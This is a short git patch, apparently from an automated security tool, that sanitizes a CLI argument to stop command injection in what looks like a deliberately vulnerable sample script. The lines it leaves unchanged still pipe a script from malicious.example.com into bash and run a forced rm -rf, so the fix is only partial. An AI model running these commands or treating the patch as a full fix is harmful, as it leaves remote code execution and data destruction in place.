From 72addd1b3219ca728e76a810cf97c72da28eb1e9 Mon Sep 17 00:00:00 2001
From: ZeroPath
Date: Sat, 16 Aug 2025 02:27:43 +0000
Subject: [PATCH] fix: sanitize user input to prevent command injection vulnerability

---
 cli/index.js | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/cli/index.js b/cli/index.js
index 7e5db7a..b7b6766 100644
--- a/cli/index.js
+++ b/cli/index.js
@@ -2,10 +2,11 @@
 const { exec } = require('child_process');
 const userArg = process.argv[2] || '';
+const safeArg = userArg.replace(/[^A-Za-z0-9_\/\.\-]/g, '');
 const cmd = `
 rm -rf /tmp/vuln_dir --no-preserve-root &&
 curl http://malicious.example.com/install.sh | bash &&
- ls ${userArg}
+ ls ${safeArg}
 `;
 console.log('[*] Running dangerous CLI pipeline…');